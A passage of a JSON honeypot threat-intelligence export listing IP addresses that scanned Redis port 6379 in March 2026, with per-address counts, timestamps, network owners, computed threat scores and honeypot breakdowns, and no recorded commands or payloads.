        "Suricata": 2
      }
    },
    "183.56.243.176": {
      "attack_count": 18,
      "first_seen": "2026-03-04T02:16:45.000Z",
      "last_seen": "2026-03-16T02:16:16.882Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": "Guangzhou",
      "asn": 135089,
      "as_org": "China Telecom",
      "threat_score": 17.2,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 9.5,
        "persistence": 10.8,
        "diversity": 4,
        "spread": 10,
        "recency_factor": 0.5
      },
      "reputation_metrics": {
        "total_events_30d": 9,
        "days_active_30d": 13,
        "ports_targeted_30d": 2,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-04T02:16:46+00:00",
        "last_seen_30d": "2026-03-16T02:16:16.882000+00:00",
        "days_since_last_seen": 15
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 6,
        "Suricata": 3
      }
    },
    "74.50.81.220": {
      "attack_count": 18,
      "first_seen": "2026-03-03T08:48:26.000Z",
      "last_seen": "2026-03-09T16:54:11.817Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": null,
      "asn": 19318,
      "as_org": "Interserver, Inc",
      "threat_score": 7.2,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 9.0,
        "persistence": 5.8,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 0.27
      },
      "reputation_metrics": {
        "total_events_30d": 8,
        "days_active_30d": 7,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-03T08:48:27+00:00",
        "last_seen_30d": "2026-03-09T16:54:11.817000+00:00",
        "days_since_last_seen": 22
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 6,
        "Suricata": 2
      }
    },
    "142.93.4.137": {
      "attack_count": 17,
      "first_seen": "2026-03-09T06:45:44.000Z",
      "last_seen": "2026-03-09T06:55:55.128Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "North Bergen",
      "asn": 14061,
      "as_org": "DigitalOcean, LLC",
      "threat_score": 33.7,
      "threat_level": "low",
      "score_components": {
        "frequency": 30,
        "persistence": 9.2,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 0.4
      },
      "reputation_metrics": {
        "total_events_30d": 113475,
        "days_active_30d": 11,
        "ports_targeted_30d": 66067,
        "honeypots_triggered_30d": 16,
        "first_seen_30d": "2026-03-03T13:47:56.762000+00:00",
        "last_seen_30d": "2026-03-13T14:23:39.149000+00:00",
        "days_since_last_seen": 18
      },
      "honeypot_breakdown_30d": {
        "Suricata": 101572,
        "Honeytrap": 11849,
        "ConPot": 9,
        "Dionaea": 9,
        "Cowrie": 8,
        "Miniprint": 8,
        "Mailoney": 6,
        "Redishoneypot": 3,
        "Adbhoney": 2,
        "Dicompot": 2,
        "ElasticPot": 1,
        "Honeyaml": 1,
        "Ipphoney": 1,
        "Medpot": 1,
        "Tanner": 1
      }
    },
    "143.244.169.56": {
      "attack_count": 17,
      "first_seen": "2026-03-11T17:55:33.000Z",
      "last_seen": "2026-03-11T17:56:43.358Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "North Bergen",
      "asn": 14061,
      "as_org": "DigitalOcean, LLC",
      "threat_score": 12.7,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 16.1,
        "persistence": 0.8,
        "diversity": 6,
        "spread": 15,
        "recency_factor": 0.33
      },
      "reputation_metrics": {
        "total_events_30d": 41,
        "days_active_30d": 1,
        "ports_targeted_30d": 3,
        "honeypots_triggered_30d": 3,
        "first_seen_30d": "2026-03-11T01:33:31+00:00",
        "last_seen_30d": "2026-03-11T17:56:43.358000+00:00",
        "days_since_last_seen": 20
      },
      "honeypot_breakdown_30d": {
        "Suricata": 21,
        "Honeytrap": 15,
        "Redishoneypot": 5
      }
    },
    "157.245.84.97": {
      "attack_count": 17,
      "first_seen": "2026-03-24T12:41:01.000Z",
      "last_seen": "2026-03-24T12:51:15.046Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "North Bergen",
      "asn": 14061,
      "as_org": "DigitalOcean, LLC",
      "threat_score": 16.3,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 8.5,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 0.77
      },
      "reputation_metrics": {
        "total_events_30d": 7,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-24T12:41:01+00:00",
        "last_seen_30d": "2026-03-24T12:51:15.046000+00:00",
        "days_since_last_seen": 7
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 5,
        "Suricata": 2
      }
    },
    "13.89.125.18": {
      "attack_count": 16,
      "first_seen": "2026-03-06T18:26:18.000Z",
      "last_seen": "2026-03-06T18:27:52.062Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Des Moines",
      "asn": 8075,
      "as_org": "Microsoft Corporation",
      "threat_score": 59.0,
      "threat_level": "medium",
      "score_components": {
        "frequency": 15.9,
        "persistence": 19.2,
        "diversity": 18,
        "spread": 15,
        "recency_factor": 0.87
      },
      "reputation_metrics": {
        "total_events_30d": 39,
        "days_active_30d": 23,
        "ports_targeted_30d": 9,
        "honeypots_triggered_30d": 3,
        "first_seen_30d": "2026-03-05T11:57:57.802000+00:00",
        "last_seen_30d": "2026-03-27T23:05:08.030000+00:00",
        "days_since_last_seen": 4
      },
      "honeypot_breakdown_30d": {
        "Suricata": 26,
        "Honeytrap": 10,
        "Redishoneypot": 3
      }
    },
    "185.242.226.22": {
      "attack_count": 16,
      "first_seen": "2026-03-02T19:43:07.000Z",
      "last_seen": "2026-03-21T19:54:27.305Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": null,
      "asn": 202425,
      "as_org": "IP Volume inc",
      "threat_score": 63.2,
      "threat_level": "high",
      "score_components": {
        "frequency": 30,
        "persistence": 20.8,
        "diversity": 20,
        "spread": 5,
        "recency_factor": 0.83
      },
      "reputation_metrics": {
        "total_events_30d": 1026,
        "days_active_30d": 25,
        "ports_targeted_30d": 476,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-02T00:00:32.939000+00:00",
        "last_seen_30d": "2026-03-26T01:20:54.676000+00:00",
        "days_since_last_seen": 5
      },
      "honeypot_breakdown_30d": {
        "Suricata": 1026
      }
    },
    "40.124.169.38": {
      "attack_count": 16,
      "first_seen": "2026-03-27T16:08:27.000Z",
      "last_seen": "2026-03-27T16:09:48.811Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "San Antonio",
      "asn": 8075,
      "as_org": "Microsoft Corporation",
      "threat_score": 68.5,
      "threat_level": "high",
      "score_components": {
        "frequency": 17.6,
        "persistence": 22.5,
        "diversity": 16,
        "spread": 20,
        "recency_factor": 0.9
      },
      "reputation_metrics": {
        "total_events_30d": 57,
        "days_active_30d": 27,
        "ports_targeted_30d": 8,
        "honeypots_triggered_30d": 4,
        "first_seen_30d": "2026-03-02T00:37:43.426000+00:00",
        "last_seen_30d": "2026-03-28T03:26:42.590000+00:00",
        "days_since_last_seen": 3
      },
      "honeypot_breakdown_30d": {
        "Suricata": 37,
        "Honeytrap": 14,
        "Dionaea": 3,
        "Redishoneypot": 3
      }
    },
    "101.201.124.141": {
      "attack_count": 15,
      "first_seen": "2026-03-20T14:35:51.000Z",
      "last_seen": "2026-03-27T07:48:31.865Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": "Beijing",
      "asn": 37963,
      "as_org": "Hangzhou Alibaba Advertising Co.,Ltd.",
      "threat_score": 16.0,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 4.8,
        "persistence": 6.7,
        "diversity": 2,
        "spread": 5,
        "recency_factor": 0.87
      },
      "reputation_metrics": {
        "total_events_30d": 3,
        "days_active_30d": 8,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-20T14:36:57.863000+00:00",
        "last_seen_30d": "2026-03-27T07:48:31.865000+00:00",
        "days_since_last_seen": 4
      },
      "honeypot_breakdown_30d": {
        "Suricata": 3
      }
    },
    "135.222.182.210": {
      "attack_count": 15,
      "first_seen": "2026-03-05T14:29:11.000Z",
      "last_seen": "2026-03-08T19:35:53.864Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Boydton",
      "asn": 8075,
      "as_org": "Microsoft Corporation",
      "threat_score": 5.2,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 7.0,
        "persistence": 3.3,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 0.23
      },
      "reputation_metrics": {
        "total_events_30d": 5,
        "days_active_30d": 4,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-05T14:29:11+00:00",
        "last_seen_30d": "2026-03-08T19:35:53.864000+00:00",
        "days_since_last_seen": 23
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 3,
        "Suricata": 2
      }
    },
    "135.237.125.196": {
      "attack_count": 15,
      "first_seen": "2026-03-03T23:03:26.000Z",
      "last_seen": "2026-03-03T23:06:51.700Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Washington",
      "asn": 8075,
      "as_org": "Microsoft Corporation",
      "threat_score": 66.2,
      "threat_level": "high",
      "score_components": {
        "frequency": 13.0,
        "persistence": 24.2,
        "diversity": 14,
        "spread": 15,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 20,
        "days_active_30d": 29,
        "ports_targeted_30d": 7,
        "honeypots_triggered_30d": 3,
        "first_seen_30d": "2026-03-03T09:18:11.342000+00:00",
        "last_seen_30d": "2026-03-31T20:24:38.154000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 14,
        "Honeytrap": 3,
        "Redishoneypot": 3
      }
    },
    "91.230.168.167": {
      "attack_count": 15,
      "first_seen": "2026-03-14T05:50:47.000Z",
      "last_seen": "2026-03-14T05:51:50.177Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Hillsboro",
      "asn": 213412,
      "as_org": "ONYPHE SAS",
      "threat_score": 80.2,
      "threat_level": "critical",
      "score_components": {
        "frequency": 20.2,
        "persistence": 25,
        "diversity": 20,
        "spread": 15,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 104,
        "days_active_30d": 30,
        "ports_targeted_30d": 37,
        "honeypots_triggered_30d": 3,
        "first_seen_30d": "2026-03-02T08:29:12+00:00",
        "last_seen_30d": "2026-03-31T19:41:53.836000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 63,
        "Honeytrap": 38,
        "Redishoneypot": 3
      }
    },
    "91.230.168.98": {
      "attack_count": 15,
      "first_seen": "2026-03-23T16:44:37.000Z",
      "last_seen": "2026-03-23T16:45:39.935Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Hillsboro",
      "asn": 213412,
      "as_org": "ONYPHE SAS",
      "threat_score": 41.8,
      "threat_level": "medium",
      "score_components": {
        "frequency": 13.8,
        "persistence": 11.7,
        "diversity": 14,
        "spread": 15,
        "recency_factor": 0.77
      },
      "reputation_metrics": {
        "total_events_30d": 24,
        "days_active_30d": 14,
        "ports_targeted_30d": 7,
        "honeypots_triggered_30d": 3,
        "first_seen_30d": "2026-03-11T09:28:11+00:00",
        "last_seen_30d": "2026-03-24T22:07:22.257000+00:00",
        "days_since_last_seen": 7
      },
      "honeypot_breakdown_30d": {
        "Suricata": 14,
        "Honeytrap": 7,
        "Redishoneypot": 3
      }
    },
    "45.156.128.56": {
      "attack_count": 14,
      "first_seen": "2026-03-12T10:08:08.000Z",
      "last_seen": "2026-03-12T10:10:52.255Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "Portugal",
      "country_code": "PT",
      "city": null,
      "asn": 211680,
      "as_org": "Sistemas Informaticos, S.A.",
      "threat_score": 93.0,
      "threat_level": "critical",
      "score_components": {
        "frequency": 23.0,
        "persistence": 25,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 198,
        "days_active_30d": 30,
        "ports_targeted_30d": 22,
        "honeypots_triggered_30d": 5,
        "first_seen_30d": "2026-03-02T08:13:29+00:00",
        "last_seen_30d": "2026-03-31T11:04:52.685000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 116,
        "Honeytrap": 75,
        "Redishoneypot": 3,
        "ElasticPot": 2,
        "Ipphoney": 2
      }
    },
    "91.230.168.29": {
      "attack_count": 14,
      "first_seen": "2026-03-27T21:14:35.000Z",
      "last_seen": "2026-03-27T21:15:41.624Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Hillsboro",
      "asn": 213412,
      "as_org": "ONYPHE SAS",
      "threat_score": 81.2,
      "threat_level": "critical",
      "score_components": {
        "frequency": 21.2,
        "persistence": 25,
        "diversity": 20,
        "spread": 15,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 131,
        "days_active_30d": 30,
        "ports_targeted_30d": 49,
        "honeypots_triggered_30d": 3,
        "first_seen_30d": "2026-03-02T09:54:20+00:00",
        "last_seen_30d": "2026-03-31T19:57:44.403000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 78,
        "Honeytrap": 50,
        "Redishoneypot": 3
      }
    },
    "91.230.168.137": {
      "attack_count": 13,
      "first_seen": "2026-03-07T00:02:47.000Z",
      "last_seen": "2026-03-07T00:04:09.683Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Hillsboro",
      "asn": 213412,
      "as_org": "ONYPHE SAS",
      "threat_score": 69.0,
      "threat_level": "high",
      "score_components": {
        "frequency": 19.2,
        "persistence": 22.5,
        "diversity": 20,
        "spread": 15,
        "recency_factor": 0.9
      },
      "reputation_metrics": {
        "total_events_30d": 83,
        "days_active_30d": 27,
        "ports_targeted_30d": 30,
        "honeypots_triggered_30d": 3,
        "first_seen_30d": "2026-03-02T18:49:54+00:00",
        "last_seen_30d": "2026-03-28T05:49:16.104000+00:00",
        "days_since_last_seen": 3
      },
      "honeypot_breakdown_30d": {
        "Suricata": 49,
        "Honeytrap": 31,
        "Redishoneypot": 3
      }
    },
    "156.146.57.180": {
      "attack_count": 12,
      "first_seen": "2026-03-12T05:23:18.000Z",
      "last_seen": "2026-03-12T05:24:28.922Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "Singapore",
      "country_code": "SG",
      "city": "Singapore",
      "asn": 212238,
      "as_org": "Datacamp Limited",
      "threat_score": 11.2,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 10.0,
        "persistence": 1.7,
        "diversity": 4,
        "spread": 15,
        "recency_factor": 0.37
      },
      "reputation_metrics": {
        "total_events_30d": 10,
        "days_active_30d": 2,
        "ports_targeted_30d": 2,
        "honeypots_triggered_30d": 3,
        "first_seen_30d": "2026-03-11T22:10:25+00:00",
        "last_seen_30d": "2026-03-12T05:24:28.922000+00:00",
        "days_since_last_seen": 19
      },
      "honeypot_breakdown_30d": {
        "Suricata": 6,
        "Redishoneypot": 3,
        "Honeytrap": 1
      }
    },
    "167.94.138.43": {
      "attack_count": 12,
      "first_seen": "2026-03-11T03:56:48.000Z",
      "last_seen": "2026-03-11T03:58:07.318Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": null,
      "asn": 398324,
      "as_org": "Censys, Inc.",
      "threat_score": 60.9,
      "threat_level": "high",
      "score_components": {
        "frequency": 20.6,
        "persistence": 17.5,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 0.73
      },
      "reputation_metrics": {
        "total_events_30d": 115,
        "days_active_30d": 21,
        "ports_targeted_30d": 29,
        "honeypots_triggered_30d": 6,
        "first_seen_30d": "2026-03-03T11:37:26+00:00",
        "last_seen_30d": "2026-03-23T16:32:58.514000+00:00",
        "days_since_last_seen": 8
      },
      "honeypot_breakdown_30d": {
        "Suricata": 67,
        "Honeytrap": 34,
        "Redishoneypot": 6,
        "CitrixHoneypot": 4,
        "ElasticPot": 3,
        "Dionaea": 1
      }
    },
    "182.138.158.161": {
      "attack_count": 12,
      "first_seen": "2026-03-31T23:18:53.000Z",
      "last_seen": "2026-03-31T23:20:02.819Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": null,
      "asn": 4134,
      "as_org": "Chinanet",
      "threat_score": 21.3,
      "threat_level": "low",
      "score_components": {
        "frequency": 8.5,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 7,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-31T23:18:53+00:00",
        "last_seen_30d": "2026-03-31T23:20:02.819000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 4,
        "Redishoneypot": 3
      }
    },
    "199.45.155.92": {
      "attack_count": 12,
      "first_seen": "2026-03-10T21:28:53.000Z",
      "last_seen": "2026-03-10T21:30:02.776Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": null,
      "asn": 398722,
      "as_org": "Censys, Inc.",
      "threat_score": 83.4,
      "threat_level": "critical",
      "score_components": {
        "frequency": 18.4,
        "persistence": 25,
        "diversity": 20,
        "spread": 20,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 69,
        "days_active_30d": 30,
        "ports_targeted_30d": 13,
        "honeypots_triggered_30d": 4,
        "first_seen_30d": "2026-03-02T22:01:42+00:00",
        "last_seen_30d": "2026-03-31T09:33:03.795000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 43,
        "Honeytrap": 16,
        "Redishoneypot": 6,
        "Honeyaml": 4
      }
    },
    "66.132.153.139": {
      "attack_count": 12,
      "first_seen": "2026-03-19T19:27:41.000Z",
      "last_seen": "2026-03-19T19:28:49.357Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": null,
      "asn": 398324,
      "as_org": "Censys, Inc.",
      "threat_score": 50.8,
      "threat_level": "medium",
      "score_components": {
        "frequency": 19.5,
        "persistence": 16.7,
        "diversity": 20,
        "spread": 20,
        "recency_factor": 0.67
      },
      "reputation_metrics": {
        "total_events_30d": 89,
        "days_active_30d": 20,
        "ports_targeted_30d": 20,
        "honeypots_triggered_30d": 4,
        "first_seen_30d": "2026-03-02T07:40:18+00:00",
        "last_seen_30d": "2026-03-21T16:36:40.584000+00:00",
        "days_since_last_seen": 10
      },
      "honeypot_breakdown_30d": {
        "Suricata": 59,
        "Honeytrap": 22,
        "Redishoneypot": 6,
        "Dionaea": 2
      }
    },
    "66.132.186.199": {
      "attack_count": 12,
      "first_seen": "2026-03-31T05:31:27.000Z",
      "last_seen": "2026-03-31T05:32:31.969Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": null,
      "asn": 398324,
      "as_org": "Censys, Inc.",
      "threat_score": 62.9,
      "threat_level": "high",
      "score_components": {
        "frequency": 16.2,
        "persistence": 6.7,
        "diversity": 20,
        "spread": 20,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 42,
        "days_active_30d": 8,
        "ports_targeted_30d": 10,
        "honeypots_triggered_30d": 4,
        "first_seen_30d": "2026-03-24T06:17:16+00:00",
        "last_seen_30d": "2026-03-31T15:18:00.181000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 22,
        "Honeytrap": 8,
        "Cowrie": 6,
        "Redishoneypot": 6
      }
    },
    "173.255.223.124": {
      "attack_count": 11,
      "first_seen": "2026-03-06T12:38:47.000Z",
      "last_seen": "2026-03-19T12:42:29.507Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Fremont",
      "asn": 63949,
      "as_org": "Akamai Connected Cloud",
      "threat_score": 73.2,
      "threat_level": "high",
      "score_components": {
        "frequency": 23.2,
        "persistence": 25,
        "diversity": 20,
        "spread": 5,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 207,
        "days_active_30d": 30,
        "ports_targeted_30d": 192,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-02T04:00:17.508000+00:00",
        "last_seen_30d": "2026-03-31T13:04:35.866000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 207
      }
    },
    "65.39.151.180": {
      "attack_count": 11,
      "first_seen": "2026-03-08T12:26:22.000Z",
      "last_seen": "2026-03-11T07:11:37.917Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "Canada",
      "country_code": "CA",
      "city": "Toronto",
      "asn": 13768,
      "as_org": "Aptum Technologies",
      "threat_score": 4.4,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 3.0,
        "persistence": 3.3,
        "diversity": 2,
        "spread": 5,
        "recency_factor": 0.33
      },
      "reputation_metrics": {
        "total_events_30d": 2,
        "days_active_30d": 4,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-08T12:27:25.324000+00:00",
        "last_seen_30d": "2026-03-11T07:11:37.917000+00:00",
        "days_since_last_seen": 20
      },
      "honeypot_breakdown_30d": {
        "Suricata": 2
      }
    },
    "100.50.17.159": {
      "attack_count": 10,
      "first_seen": "2026-03-02T04:13:20.000Z",
      "last_seen": "2026-03-31T02:00:05.761Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Ashburn",
      "asn": 14618,
      "as_org": "Amazon.com, Inc.",
      "threat_score": 76.4,
      "threat_level": "high",
      "score_components": {
        "frequency": 26.4,
        "persistence": 25,
        "diversity": 20,
        "spread": 5,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 434,
        "days_active_30d": 30,
        "ports_targeted_30d": 186,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-02T01:03:23.192000+00:00",
        "last_seen_30d": "2026-03-31T19:19:59.829000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 434
      }
    },
    "170.84.23.31": {
      "attack_count": 10,
      "first_seen": "2026-03-02T05:07:58.000Z",
      "last_seen": "2026-03-02T09:36:30.865Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "Brazil",
      "country_code": "BR",
      "city": "Betim",
      "asn": 264990,
      "as_org": "WT INFORMATICA TELECOMUNICACOES LTDA - ME",
      "threat_score": 1.1,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 3.0,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 5,
        "recency_factor": 0.1
      },
      "reputation_metrics": {
        "total_events_30d": 2,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-02T05:09:01.123000+00:00",
        "last_seen_30d": "2026-03-02T09:36:30.865000+00:00",
        "days_since_last_seen": 29
      },
      "honeypot_breakdown_30d": {
        "Suricata": 2
      }
    },
    "185.242.226.21": {
      "attack_count": 10,
      "first_seen": "2026-03-12T02:47:55.000Z",
      "last_seen": "2026-03-23T20:18:51.359Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": null,
      "asn": 202425,
      "as_org": "IP Volume inc",
      "threat_score": 63.2,
      "threat_level": "high",
      "score_components": {
        "frequency": 30,
        "persistence": 20.8,
        "diversity": 20,
        "spread": 5,
        "recency_factor": 0.83
      },
      "reputation_metrics": {
        "total_events_30d": 1111,
        "days_active_30d": 25,
        "ports_targeted_30d": 506,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-02T00:04:04.956000+00:00",
        "last_seen_30d": "2026-03-26T01:25:09.472000+00:00",
        "days_since_last_seen": 5
      },
      "honeypot_breakdown_30d": {
        "Suricata": 1111
      }
    },
    "20.226.167.46": {
      "attack_count": 10,
      "first_seen": "2026-03-05T15:20:27.000Z",
      "last_seen": "2026-03-06T08:45:03.889Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "Brazil",
      "country_code": "BR",
      "city": "Campinas",
      "asn": 8075,
      "as_org": "Microsoft Corporation",
      "threat_score": 1.9,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 3.0,
        "persistence": 1.7,
        "diversity": 2,
        "spread": 5,
        "recency_factor": 0.17
      },
      "reputation_metrics": {
        "total_events_30d": 2,
        "days_active_30d": 2,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-05T15:22:04.412000+00:00",
        "last_seen_30d": "2026-03-06T08:45:03.889000+00:00",
        "days_since_last_seen": 25
      },
      "honeypot_breakdown_30d": {
        "Suricata": 2
      }
    },
    "20.87.195.41": {
      "attack_count": 10,
      "first_seen": "2026-03-14T23:34:57.000Z",
      "last_seen": "2026-03-17T08:04:17.532Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "South Africa",
      "country_code": "ZA",
      "city": "Johannesburg",
      "asn": 8075,
      "as_org": "Microsoft Corporation",
      "threat_score": 7.1,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 3.0,
        "persistence": 3.3,
        "diversity": 2,
        "spread": 5,
        "recency_factor": 0.53
      },
      "reputation_metrics": {
        "total_events_30d": 2,
        "days_active_30d": 4,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-14T23:36:05.916000+00:00",
        "last_seen_30d": "2026-03-17T08:04:17.532000+00:00",
        "days_since_last_seen": 14
      },
      "honeypot_breakdown_30d": {
        "Suricata": 2
      }
    },
    "205.210.31.84": {
      "attack_count": 10,
      "first_seen": "2026-03-07T19:51:50.000Z",
      "last_seen": "2026-03-07T19:53:27.236Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": null,
      "asn": 396982,
      "as_org": "Google LLC",
      "threat_score": 90.5,
      "threat_level": "critical",
      "score_components": {
        "frequency": 20.5,
        "persistence": 25,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 111,
        "days_active_30d": 30,
        "ports_targeted_30d": 33,
        "honeypots_triggered_30d": 8,
        "first_seen_30d": "2026-03-02T06:00:29+00:00",
        "last_seen_30d": "2026-03-31T21:42:05.908000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 71,
        "Honeytrap": 19,
        "Miniprint": 10,
        "Adbhoney": 4,
        "Redishoneypot": 3,
        "Cowrie": 2,
        "Dionaea": 1,
        "Tanner": 1
      }
    },
    "48.211.170.175": {
      "attack_count": 10,
      "first_seen": "2026-03-19T10:22:15.000Z",
      "last_seen": "2026-03-19T10:23:22.380Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Boydton",
      "asn": 8075,
      "as_org": "Microsoft Corporation",
